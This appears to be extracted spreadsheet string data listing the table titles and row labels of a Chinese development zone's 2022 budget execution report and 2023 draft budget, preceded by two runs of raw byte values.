    <t xml:space="preserve">83 176 86 5 76 5 76 7 92 12 152 243 20 47 143 72 29 170 202 236 181 213 245 180 204 174 172 170 145 43 183 54 120 171 234 88 172 245 86 180 245 142 126 29 66 28 106 106 119 84 110 207 88 28 226 216 232 218 190 96 200 149 24 95 97 69 95 151 13 177 146 141 182 210 12 73 176 104 161 110 197 203 133 30 106 253 171 173 175 98 172 128 117 171 34 253 106 54 44 197 5 25 181 97 50 52 106 94 80 198 77 181 161 82 205 118 63 223 228 125 126 56 235 195 200 117 183 88 55 195 219 244 120 86 55 215 209 249 240 98 225 44 202 186 138 191 190 168 171 89 144 226 133 70 93 14 171 93 13 222 188 170 186 26 143 171 145 133 189 173 200 92 208 203 20 111 188 144 199 195 227 174 163 172 52 195 215 174 225 43 79 146 192 83 191 109 208 123 26 84 106 220 43 230 138 91 191 194 14 139 21 206 185 49 202 238 70 248 186 155 13 185 3 129 59 28 95 176 31 17 109 191 33 123 173 254 29 68 174 174 245 171 124 96 181 189 217 195 227 68 180 58 109 87 131 158 185 90 27 98 174 242 117 187 47 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 127 25 128 191 161 207 162 163 14 233 52 111 86 206 88 27 234 215 57 225 138 159 114 210 132 85 141 80 56 19 233 31 183 197 240 63 60 200 63 142 45 104 198 223 231 179 182 133 112 189 12 215 69 205 100 208 102 80 124 212 1 29 24 36 23 215 239 180 152 162 251 167 198 240 79 139 225 159 5 151 194 149 192 79 2 25 132 142 117 121 54 215 19 215 220 237 217 60 190 230 238 202 97 172 79 23 254 240 26 70 231 159 117 69 156 226 104 161 115 12 203 88 9 171 164 179 96 139 225 110 45 91 207 10 192 141 167 190 174 102 220 152 238 57 243 239 31 134 126 85 192 88 164 253 17 51 27 108 145 36 135 104 25 233 92 106 231 122 173 101 117 116 98 21 194 76 138 85 10 79 209 30 76 147 208 235 228 231 232 32 140 54 119 153 209 238 137 9 100 242 138 147 194 182 69 225 148 67 97 28 108 49 224 211 116 93 69 101 51 135 180 103 </t>
  </si>
  <si>
    <t xml:space="preserve">53 123 209 152 198 78 200 81 21 217 164 65 64 75 100 219 137 43 234 131 78 128 176 92 255 187 134 53 147 174 167 62 108 164 102 56 35 254 168 29 172 201 19 126 14 16 2 234 143 59 132 17 3 7 133 13 231 31 25 35 60 252 56 8 191 86 28 24 211 8 87 212 111 13 73 212 68 86 210 106 232 152 23 70 117 31 45 75 175 167 82 218 70 121 226 250 176 92 182 186 168 241 230 209 81 52 174 224 251 140 99 118 187 68 109 2 107 202 130 102 187 221 74 150 113 176 30 45 108 182 90 185 11 107 217 162 102 180 37 161 153 115 208 172 231 116 199 108 177 162 229 181 181 137 179 86 219 240 22 176 141 117 119 99 44 149 254 81 57 154 46 248 167 210 55 218 33 251 1 75 127 11 82 85 237 111 105 96 73 16 186 191 129 241 43 11 187 82 163 77 106 99 227 122 241 102 220 93 126 233 29 86 95 195 229 0 60 0 237 28 58 155 110 200 125 119 2 96 82 20 220 195 216 37 85 23 71 229 54 55 236 188 111 10 150 83 155 244 213 150 211 159 20 14 168 9 13 122 151 170 38 180 8 15 11 255 164 158 208 194 61 180 79 236 218 243 160 187 129 133 185 67 69 253 85 184 219 219 245 238 144 11 221 232 186 123 87 115 135 187 16 134 114 253 31 131 26 21 206 171 234 3 182 7 26 192 116 24 163 18 0 241 186 103 128 153 212 225 227 10 117 32 78 85 7 86 168 234 125 53 54 132 215 115 83 180 33 66 47 235 16 242 46 219 163 94 120 48 125 96 197 131 132 251 234 131 233 128 123 238 171 159 171 67 227 121 245 254 131 229 234 253 11 231 213 129 101 43 224 250 197 242 14 89 94 221 127 254 242 50 102 113 6 24 96 128 1 6 24 48 124 248 95 253 </t>
  </si>
  <si>
    <t>威海经济技术开发区2022年预算执行情况和2023年预算草案</t>
  </si>
  <si>
    <t>经技区2022年预算执行情况和2023年预算草案目录</t>
  </si>
  <si>
    <t>第一部分  一般公共预算</t>
  </si>
  <si>
    <t xml:space="preserve">表1.2022年经技区一般公共预算收入执行情况表 </t>
  </si>
  <si>
    <t xml:space="preserve">表2.2022年经技区一般公共预算支出执行情况表 </t>
  </si>
  <si>
    <t xml:space="preserve">表3.2022年市级对经技区税收返还及转移支付情况表 </t>
  </si>
  <si>
    <t xml:space="preserve">表4.2022年经技区对下税收返还执行情况表 </t>
  </si>
  <si>
    <t>表5.2022年经技区对下一般性转移支付执行情况表</t>
  </si>
  <si>
    <t>表6.2022年经技区对下专项转移支付执行情况表</t>
  </si>
  <si>
    <t>表7.2022年经技区一般公共预算重点项目执行情况表</t>
  </si>
  <si>
    <t>表8.2023年经技区一般公共预算收入草案表</t>
  </si>
  <si>
    <t>表9.2023年经技区一般公共预算支出草案表</t>
  </si>
  <si>
    <t>表10.2023年经技区一般公共预算支出草案表（按经济分类）</t>
  </si>
  <si>
    <t>表11.2023年经技区财力安排的一般性转移支付分项目草案表</t>
  </si>
  <si>
    <t>表12.2023年经技区财力安排的专项转移支付分项目草案表</t>
  </si>
  <si>
    <t>表13.2023年经技区财力安排的税收返还和转移支付分区市草案表</t>
  </si>
  <si>
    <t>表14.2023年经技区部门预算草案表</t>
  </si>
  <si>
    <t>表15.2023年经技区一般公共预算支出预算明细表(按功能分类)</t>
  </si>
  <si>
    <t>表16.2023年经技区一般公共预算重点项目支出表</t>
  </si>
  <si>
    <t>第二部分  政府性基金预算</t>
  </si>
  <si>
    <t>表17.2022年经技区政府性基金预算收入执行情况表</t>
  </si>
  <si>
    <t>表18.2022年经技区政府性基金预算支出执行情况表</t>
  </si>
  <si>
    <t>表19.2022年经技区政府性基金预算转移支付分项目执行情况表</t>
  </si>
  <si>
    <t>表20.2022年经技区政府性基金预算重点项目执行情况表</t>
  </si>
  <si>
    <t>表21.2023年经技区政府性基金预算收入草案表</t>
  </si>
  <si>
    <t>表22.2023年经技区政府性基金预算支出草案表</t>
  </si>
  <si>
    <t>表23.2023年经技区政府性基金预算支出草案表（按功能分类）</t>
  </si>
  <si>
    <t>表24.2023年经技区政府性基金预算支出草案表（按经济分类）</t>
  </si>
  <si>
    <t>表25.2023年经技区政府性基金预算重点项目支出表</t>
  </si>
  <si>
    <t>第三部分  国有资本经营预算</t>
  </si>
  <si>
    <t>表26.2022年经技区国有资本经营预算收入执行情况表</t>
  </si>
  <si>
    <t>表27.2022年经技区国有资本经营预算支出执行情况表</t>
  </si>
  <si>
    <t>表28.2022年经技区国有资本经营预算转移支付分区市分项目执行情况表</t>
  </si>
  <si>
    <t>表29.2023年经技区国有资本经营预算收入草案表</t>
  </si>
  <si>
    <t>表30.2023年经技区国有资本经营预算支出草案表</t>
  </si>
  <si>
    <t>第四部分  社会保险基金预算</t>
  </si>
  <si>
    <t>表31.2022年经技区社会保险基金预算收入执行情况表</t>
  </si>
  <si>
    <t>表32.2022年经技区社会保险基金预算支出执行情况表</t>
  </si>
  <si>
    <t>表33.2022年末经技区社会保险基金预算结余执行情况表</t>
  </si>
  <si>
    <t>表34.2023年经技区社会保险基金预算收入草案表</t>
  </si>
  <si>
    <t>表35.2023年经技区社会保险基金预算支出草案表</t>
  </si>
  <si>
    <t>表36.2023年末经技区社会保险基金预算结余草案表</t>
  </si>
  <si>
    <t>第五部分  地方政府债务</t>
  </si>
  <si>
    <t>表37.2022年经技区地方政府债务限额余额及还本付息情况表</t>
  </si>
  <si>
    <t xml:space="preserve">表38.2022年经技区地方政府债务限额及余额执行情况明细表 </t>
  </si>
  <si>
    <t>表39.2022年经技区地方政府债券分配情况表</t>
  </si>
  <si>
    <t>表40.2022年经技区地方政府债券发行情况表</t>
  </si>
  <si>
    <t xml:space="preserve">表41.2022年末经技区地方政府债券年限情况表 </t>
  </si>
  <si>
    <t xml:space="preserve">表42.2022年经技区地方政府新增一般债券使用情况表 </t>
  </si>
  <si>
    <t xml:space="preserve">表43.2022年经技区地方政府新增专项债券使用情况表 </t>
  </si>
  <si>
    <t xml:space="preserve">表44.2022年经技区新增政府债券和政府外贷分项目安排情况表 </t>
  </si>
  <si>
    <t>表45.2023年经技区政府债务收支计划表</t>
  </si>
  <si>
    <t xml:space="preserve">表46.2023年经技区政府债务（转贷）收入分区市计划表 </t>
  </si>
  <si>
    <t>表47.2023年经技区政府债务收支计划表</t>
  </si>
  <si>
    <t xml:space="preserve">表48.2023年经技区地方政府新增政府债券安排重大建设项目情况表 </t>
  </si>
  <si>
    <t>第六部分  其他附表及文字说明</t>
  </si>
  <si>
    <t xml:space="preserve">表49.2023年经技区财政专项资金目录清单表 </t>
  </si>
  <si>
    <t>表50.2022年经技区重点绩效评价情况表</t>
  </si>
  <si>
    <t xml:space="preserve">表51.2022年经技区财政专户管理资金收支执行情况表 </t>
  </si>
  <si>
    <t xml:space="preserve">表52.2023年经技区财政专户管理资金收支计划草案表 </t>
  </si>
  <si>
    <t>附件1.名词注释</t>
  </si>
  <si>
    <t xml:space="preserve">附件2.关于经技区地方政府债务2022年执行及2023年预算有关情况的说明  </t>
  </si>
  <si>
    <t>表1</t>
  </si>
  <si>
    <t>2022年经技区一般公共预算收入执行情况表</t>
  </si>
  <si>
    <t>单位：万元</t>
  </si>
  <si>
    <t>项       目</t>
  </si>
  <si>
    <t>2021年
决算数</t>
  </si>
  <si>
    <t>2022年
预算数</t>
  </si>
  <si>
    <t>2022年
调整预算数</t>
  </si>
  <si>
    <t>2022年
执行数</t>
  </si>
  <si>
    <t>一、税收收入</t>
  </si>
  <si>
    <t xml:space="preserve">    国内增值税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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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本年收入合计</t>
  </si>
  <si>
    <t>转移性收入</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府一般债务转贷收入</t>
  </si>
  <si>
    <t xml:space="preserve">    返还性收入</t>
  </si>
  <si>
    <t xml:space="preserve">    一般性转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve">    专项转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve">    调入资金</t>
  </si>
  <si>
    <t xml:space="preserve">    动用预算稳定调节基金</t>
  </si>
  <si>
    <t xml:space="preserve">    上年结转收入</t>
  </si>
  <si>
    <t>收入总计</t>
  </si>
  <si>
    <t>表2</t>
  </si>
  <si>
    <t>2022年经技区一般公共预算支出执行情况表</t>
  </si>
  <si>
    <t>一、一般公共服务支出</t>
  </si>
  <si>
    <t>二、国防支出</t>
  </si>
  <si>
    <t>三、公共安全支出</t>
  </si>
  <si>
    <t>四、教育支出</t>
  </si>
  <si>
    <t>五、科学技术支出</t>
  </si>
  <si>
    <t>六、文化旅游体育与传媒支出</t>
  </si>
  <si>
    <t>七、社会保障和就业支出</t>
  </si>
  <si>
    <t>八、卫生健康支出</t>
  </si>
  <si>
    <t>九、节能环保支出</t>
  </si>
  <si>
    <t>十、城乡社区支出</t>
  </si>
  <si>
    <t>十一、农林水支出</t>
  </si>
  <si>
    <t>十二、交通运输支出</t>
  </si>
  <si>
    <t>十三、资源勘探工业信息等支出</t>
  </si>
  <si>
    <t>十四、商业服务业等支出</t>
  </si>
  <si>
    <t>十五、金融支出</t>
  </si>
  <si>
    <t>十六、援助其他地区支出</t>
  </si>
  <si>
    <t>十七、自然资源海洋气象等支出</t>
  </si>
  <si>
    <t>十八、住房保障支出</t>
  </si>
  <si>
    <t>十九、粮油物资储备支出</t>
  </si>
  <si>
    <t>二十、灾害防治及应急管理支出</t>
  </si>
  <si>
    <t>二十一、预备费</t>
  </si>
  <si>
    <t>二十二、债务付息支出</t>
  </si>
  <si>
    <t>二十三、其他支出</t>
  </si>
  <si>
    <t>本年支出合计</t>
  </si>
  <si>
    <t>转移性支出</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府一般债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">    上解上级支出</t>
  </si>
  <si>
    <t xml:space="preserve">    安排预算稳定调节基金</t>
  </si>
  <si>
    <t xml:space="preserve">    补充预算周转金</t>
  </si>
  <si>
    <t xml:space="preserve">    结转下年支出</t>
  </si>
  <si>
    <t>支出总计</t>
  </si>
  <si>
    <t>表3</t>
  </si>
  <si>
    <t>2022年市级对经技区税收返还及转移支付情况表</t>
  </si>
  <si>
    <t>项    目</t>
  </si>
  <si>
    <t>金    额</t>
  </si>
  <si>
    <t>合    计</t>
  </si>
  <si>
    <t>一、返还性收入</t>
  </si>
  <si>
    <t xml:space="preserve">    所得税基数返还收入</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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其他返还收入</t>
  </si>
  <si>
    <t>二、一般性转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve">    公共安全财政共同事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve">    教育共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve">    社会保障和就业共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve">    医疗卫生共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve">    农林水共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve">    交通运输共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve">    自然资源海洋气象等共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve">    住房保障共同财政事权转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve">    其他各项一般性转移支付收入</t>
  </si>
  <si>
    <t>三、专项转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve">    一般公共服务</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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工业商业金融等</t>
  </si>
  <si>
    <t xml:space="preserve">    自然资源海洋气象等</t>
  </si>
  <si>
    <t xml:space="preserve">    住房保障</t>
  </si>
  <si>
    <t xml:space="preserve">    其他各项专项转移支付</t>
  </si>
  <si>
    <t>表4</t>
  </si>
  <si>
    <t>2022年经技区对下税收返还执行情况表</t>
  </si>
  <si>
    <t>地  区</t>
  </si>
  <si>
    <t>合  计</t>
  </si>
  <si>
    <t>所得税基数返还</t>
  </si>
  <si>
    <t>成品油税费改革税收返还</t>
  </si>
  <si>
    <t>增值税税收返还</t>
  </si>
  <si>
    <t>消费税税收返还</t>
  </si>
  <si>
    <t>增值税“五五分享”税收返还</t>
  </si>
  <si>
    <t>其他返还</t>
  </si>
  <si>
    <t>合　计</t>
  </si>
  <si>
    <t>注：根据现行财政体制，区本级没有对下税收返还，因此，本表为空值。</t>
  </si>
  <si>
    <t>表5</t>
  </si>
  <si>
    <t>2022年经技区对下一般性转移支付执行情况表</t>
  </si>
  <si>
    <t>区  市</t>
  </si>
  <si>
    <t>公共安全财政共同事权转移支付</t>
  </si>
  <si>
    <t>教育共同财政事权转移支付</t>
  </si>
  <si>
    <t>社会保障和就业共同财政事权转移支付</t>
  </si>
  <si>
    <t>医疗卫生共同财政事权转移支付</t>
  </si>
  <si>
    <t>农林水共同财政事权转移支付</t>
  </si>
  <si>
    <t>交通运输共同财政事权转移支付</t>
  </si>
  <si>
    <t>自然资源海洋气象等共同财政事权转移支付</t>
  </si>
  <si>
    <t>住房保障共同财政事权转移支付</t>
  </si>
  <si>
    <t>其他各项一般性转移支付</t>
  </si>
  <si>
    <t>注：根据现行财政体制，区本级没有对下转移支付，因此，本表为空值。</t>
  </si>
  <si>
    <t>表6</t>
  </si>
  <si>
    <t>2022年经技区对下专项转移支付执行情况表</t>
  </si>
  <si>
    <t>区市</t>
  </si>
  <si>
    <t>合计</t>
  </si>
  <si>
    <t>一般公共服务</t>
  </si>
  <si>
    <t>公共安全</t>
  </si>
  <si>
    <t>教育</t>
  </si>
  <si>
    <t>科学技术</t>
  </si>
  <si>
    <t>文化旅游体育与传媒</t>
  </si>
  <si>
    <t>社会保障和就业</t>
  </si>
  <si>
    <t>卫生健康</t>
  </si>
  <si>
    <t>节能
环保</t>
  </si>
  <si>
    <t>城乡社区</t>
  </si>
  <si>
    <t>农林水</t>
  </si>
  <si>
    <t>交通
运输</t>
  </si>
  <si>
    <t>工业商业金融等</t>
  </si>
  <si>
    <t>自然资源海洋气象等</t>
  </si>
  <si>
    <t>住房
保障</t>
  </si>
  <si>
    <t>其他各项专项转移支付</t>
  </si>
  <si>
    <t>表7</t>
  </si>
  <si>
    <t>2022年经技区一般公共预算重点项目执行情况表</t>
  </si>
  <si>
    <t>序号</t>
  </si>
  <si>
    <t>项目名称</t>
  </si>
  <si>
    <t>2022年预算数</t>
  </si>
  <si>
    <t>2022年执行数</t>
  </si>
  <si>
    <t>一、支农支出主要项目</t>
  </si>
  <si>
    <t>村居两委干部目标考核及村级组织运转补助</t>
  </si>
  <si>
    <t>二、科技、人才和支持经济发展支出主要项目</t>
  </si>
  <si>
    <t>新旧动能转换扶持资金</t>
  </si>
  <si>
    <t>科技发展扶持资金</t>
  </si>
  <si>
    <t>就业再就业和创业扶持</t>
  </si>
  <si>
    <t>三、文体教育支出主要项目</t>
  </si>
  <si>
    <t>学前教育支出</t>
  </si>
  <si>
    <t>义务教育支出</t>
  </si>
  <si>
    <t>四、社会保障、卫生、民政支出主要项目</t>
  </si>
  <si>
    <t>城乡居民社会养老保险财政补贴</t>
  </si>
  <si>
    <t>基本公共卫生服务财政补助资金</t>
  </si>
  <si>
    <t>疫情防控经费</t>
  </si>
  <si>
    <t>居民基本医疗保险财政补贴</t>
  </si>
  <si>
    <t>计划生育专项经费</t>
  </si>
  <si>
    <t>五、其他支出主要项目</t>
  </si>
  <si>
    <t>公安、消防设施等经费</t>
  </si>
  <si>
    <t>表8</t>
  </si>
  <si>
    <t xml:space="preserve">   2023年经技区一般公共预算收入草案表</t>
  </si>
  <si>
    <t>2023年预算数</t>
  </si>
  <si>
    <t>收入合计</t>
  </si>
  <si>
    <t>表9</t>
  </si>
  <si>
    <t xml:space="preserve">   2023年经技区一般公共预算支出草案表</t>
  </si>
  <si>
    <t>支出合计</t>
  </si>
  <si>
    <t>表10</t>
  </si>
  <si>
    <t>2023年经技区一般公共预算支出草案表（按经济分类）</t>
  </si>
  <si>
    <t>单位:万元</t>
  </si>
  <si>
    <t>科目名称</t>
  </si>
  <si>
    <t>基本支出</t>
  </si>
  <si>
    <t>项目支出</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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13682</t>
  </si>
  <si>
    <t>三、机关资本性支出（一）</t>
  </si>
  <si>
    <t xml:space="preserve">    基础设施建设</t>
  </si>
  <si>
    <t xml:space="preserve">    设备购置</t>
  </si>
  <si>
    <t xml:space="preserve">    其他资本性支出</t>
  </si>
  <si>
    <t>四、对事业单位经常性补助</t>
  </si>
  <si>
    <t xml:space="preserve">    工资福利支出</t>
  </si>
  <si>
    <t xml:space="preserve">    商品和服务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他对事业单位补助</t>
  </si>
  <si>
    <t>五、对事业单位资本性补助</t>
  </si>
  <si>
    <t xml:space="preserve">    资本性支出（一）</t>
  </si>
  <si>
    <t>六、对企业补助</t>
  </si>
  <si>
    <t xml:space="preserve">    费用补贴</t>
  </si>
  <si>
    <t xml:space="preserve">    其他对企业补助</t>
  </si>
  <si>
    <t>七、对个人和家庭的补助</t>
  </si>
  <si>
    <t xml:space="preserve">    社会福利和救助</t>
  </si>
  <si>
    <t xml:space="preserve">    助学金</t>
  </si>
  <si>
    <t xml:space="preserve">    个人农业生产补贴</t>
  </si>
  <si>
    <t xml:space="preserve">    离退休费</t>
  </si>
  <si>
    <t xml:space="preserve">    其他对个人和家庭补助</t>
  </si>
  <si>
    <t>八、对社会保障基金补助</t>
  </si>
  <si>
    <t xml:space="preserve">    对社会保险基金补助</t>
  </si>
  <si>
    <t>九、债务利息及费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国内债务付息</t>
  </si>
  <si>
    <t>十、预备费及预留</t>
  </si>
  <si>
    <t xml:space="preserve">    预备费</t>
  </si>
  <si>
    <t>十一、其他支出</t>
  </si>
  <si>
    <t xml:space="preserve">    赠与</t>
  </si>
  <si>
    <t xml:space="preserve">    国家赔偿费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他支出</t>
  </si>
  <si>
    <t>表11</t>
  </si>
  <si>
    <t>2023年经技区财力安排的一般性转移支付分项目草案表</t>
  </si>
  <si>
    <t>一、农林水共同财政事权转移支付收入</t>
  </si>
  <si>
    <t>二、社会保障和就业共同财政事权转移支付收入</t>
  </si>
  <si>
    <t>三、医疗卫生共同财政事权转移支付收入</t>
  </si>
  <si>
    <t>四、其他各类一般性转移支付收入</t>
  </si>
  <si>
    <t>备注：根据现行财政体制，区本级没有对下转移支付，因此，本表为空值。</t>
  </si>
  <si>
    <t>表12</t>
  </si>
  <si>
    <t>2023年经技区财力安排的专项转移支付分项目草案表</t>
  </si>
  <si>
    <t>一、一般公共服务</t>
  </si>
  <si>
    <t>二、公共安全</t>
  </si>
  <si>
    <t>三、教育</t>
  </si>
  <si>
    <t>四、科学技术</t>
  </si>
  <si>
    <t>五、文化旅游体育与传媒</t>
  </si>
  <si>
    <t>六、社会保障和就业</t>
  </si>
  <si>
    <t>七、卫生健康</t>
  </si>
  <si>
    <t>八、节能环保</t>
  </si>
  <si>
    <t>九、城乡社区</t>
  </si>
  <si>
    <t>十、农林水</t>
  </si>
  <si>
    <t>十一、交通运输</t>
  </si>
  <si>
    <t>十二、工业商业金融等</t>
  </si>
  <si>
    <t>十三、自然资源海洋气象等</t>
  </si>
  <si>
    <t>十四、住房保障</t>
  </si>
  <si>
    <t>十五、其他各项专项转移支付</t>
  </si>
  <si>
    <t>表13</t>
  </si>
  <si>
    <t xml:space="preserve">2023年经技区财力安排的税收返还和转移支付分区市草案表    </t>
  </si>
  <si>
    <t>项  目</t>
  </si>
  <si>
    <t>税收返还</t>
  </si>
  <si>
    <t>一般性转移支付</t>
  </si>
  <si>
    <t>专项转移支付</t>
  </si>
  <si>
    <t>备注：根据现行财政体制，区本级没有对下税收返还和转移支付，因此，本表为空值。</t>
  </si>
  <si>
    <t>表14</t>
  </si>
  <si>
    <t>2023年经技区部门预算草案表</t>
  </si>
  <si>
    <t>部门名称</t>
  </si>
  <si>
    <t>中共威海市纪律检查委员会、威海市监察委员会经济技术开发区纪检监察工作委员会</t>
  </si>
  <si>
    <t>威海经济技术开发区党政办公室</t>
  </si>
  <si>
    <t>中共威海市委经济技术开发区工作委员会党群工作部</t>
  </si>
  <si>
    <t>威海经济技术开发区经济发展局</t>
  </si>
  <si>
    <t>威海经济技术开发区商务局</t>
  </si>
  <si>
    <t>威海经济技术开发区财政金融局</t>
  </si>
  <si>
    <t>威海经济技术开发区建设局</t>
  </si>
  <si>
    <t>威海经济技术开发区行政审批服务局</t>
  </si>
  <si>
    <t>威海经济技术开发区科技创新局</t>
  </si>
  <si>
    <t>威海经济技术开发区社会工作部</t>
  </si>
  <si>
    <t>威海经济技术开发区市场监督管理局</t>
  </si>
  <si>
    <t>威海市公安局经济技术开发区分局</t>
  </si>
  <si>
    <t>威海市教育局经济技术开发区分局</t>
  </si>
  <si>
    <t>威海市卫生健康委员会经济技术开发区管理办公室</t>
  </si>
  <si>
    <t>备注：2023年预算数包括当年一般公共预算拨款、政府性基金预算拨款。</t>
  </si>
  <si>
    <t>表15</t>
  </si>
  <si>
    <t>2023年经技区一般公共预算支出预算明细表(按功能分类)</t>
  </si>
  <si>
    <t>科目代码</t>
  </si>
  <si>
    <t>一般公共预算支出合计</t>
  </si>
  <si>
    <t xml:space="preserve">  一般公共服务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    政府办公厅(室)及相关机构事务</t>
  </si>
  <si>
    <t xml:space="preserve">      行政运行</t>
  </si>
  <si>
    <t xml:space="preserve">      政务公开审批</t>
  </si>
  <si>
    <t xml:space="preserve">      信访事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他政府办公厅(室)及相关机构事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    发展与改革事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他发展与改革事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    统计信息事务</t>
  </si>
  <si>
    <t xml:space="preserve">      专项普查活动</t>
  </si>
  <si>
    <t xml:space="preserve">      其他统计信息事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    财政事务</t>
  </si>
  <si>
    <t xml:space="preserve">      信息化建设</t>
  </si>
  <si>
    <t xml:space="preserve">    税收事务</t>
  </si>
  <si>
    <t xml:space="preserve">    纪检监察事务</t>
  </si>
  <si>
    <t xml:space="preserve">      大案要案查处</t>
  </si>
  <si>
    <t xml:space="preserve">    商贸事务</t>
  </si>
  <si>
    <t xml:space="preserve">      招商引资</t>
  </si>
  <si>
    <t xml:space="preserve">      其他商贸事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    知识产权事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他知识产权事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    群众团体事务</t>
  </si>
  <si>
    <t xml:space="preserve">      工会事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他群众团体事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    党委办公厅(室)及相关机构事务</t>
  </si>
  <si>
    <t xml:space="preserve">    组织事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他组织事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    宣传事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他宣传事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    统战事务</t>
  </si>
  <si>
    <t xml:space="preserve">      一般行政管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      宗教事务</t>
  </si>
  <si>
    <t xml:space="preserve">    其他共产党事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他共产党事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    市场监督管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      药品事务</t>
  </si>
  <si>
    <t xml:space="preserve">      质量安全监管</t>
  </si>
  <si>
    <t xml:space="preserve">      食品安全监管</t>
  </si>
  <si>
    <t xml:space="preserve">      其他市场监督管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">    其他一般公共服务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他一般公共服务支出</t>
  </si>
  <si>
    <t xml:space="preserve">  国防支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国防动员</t>
  </si>
  <si>
    <t xml:space="preserve">      民兵</t>
  </si>
  <si>
    <t xml:space="preserve">  公共安全支出</t>
  </si>
  <si>
    <t xml:space="preserve">    武装警察部队</t>
  </si>
  <si>
    <t xml:space="preserve">      其他武装警察部队支出</t>
  </si>
  <si>
    <t xml:space="preserve">    公安</t>
  </si>
  <si>
    <t xml:space="preserve">      执法办案</t>
  </si>
  <si>
    <t xml:space="preserve">      其他公安支出</t>
  </si>
  <si>
    <t xml:space="preserve">    司法</t>
  </si>
  <si>
    <t xml:space="preserve">      基层司法业务</t>
  </si>
  <si>
    <t xml:space="preserve">      公共法律服务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他司法支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他公共安全支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他公共安全支出</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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其他普通教育支出</t>
  </si>
  <si>
    <t xml:space="preserve">    职业教育</t>
  </si>
  <si>
    <t xml:space="preserve">      中等职业教育</t>
  </si>
  <si>
    <t xml:space="preserve">    其他教育支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他教育支出</t>
  </si>
  <si>
    <t xml:space="preserve">  科学技术支出</t>
  </si>
  <si>
    <t xml:space="preserve">    科学技术管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他科学技术管理事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    技术研究与开发</t>
  </si>
  <si>
    <t xml:space="preserve">      其他技术研究与开发支出</t>
  </si>
  <si>
    <t xml:space="preserve">    科学技术普及</t>
  </si>
  <si>
    <t xml:space="preserve">      其他科学技术普及支出</t>
  </si>
  <si>
    <t xml:space="preserve">    科技重大项目</t>
  </si>
  <si>
    <t xml:space="preserve">      其他科技重大项目</t>
  </si>
  <si>
    <t xml:space="preserve">    其他科学技术支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他科学技术支出</t>
  </si>
  <si>
    <t xml:space="preserve">  文化旅游体育与传媒支出</t>
  </si>
  <si>
    <t xml:space="preserve">    文化和旅游</t>
  </si>
  <si>
    <t xml:space="preserve">      图书馆</t>
  </si>
  <si>
    <t xml:space="preserve">      群众文化</t>
  </si>
  <si>
    <t xml:space="preserve">      其他文化和旅游支出</t>
  </si>
  <si>
    <t xml:space="preserve">    体育</t>
  </si>
  <si>
    <t xml:space="preserve">      体育竞赛</t>
  </si>
  <si>
    <t xml:space="preserve">    新闻出版电影</t>
  </si>
  <si>
    <t xml:space="preserve">      电影</t>
  </si>
  <si>
    <t xml:space="preserve">  社会保障和就业支出</t>
  </si>
  <si>
    <t xml:space="preserve">    人力资源和社会保障管理事务</t>
  </si>
  <si>
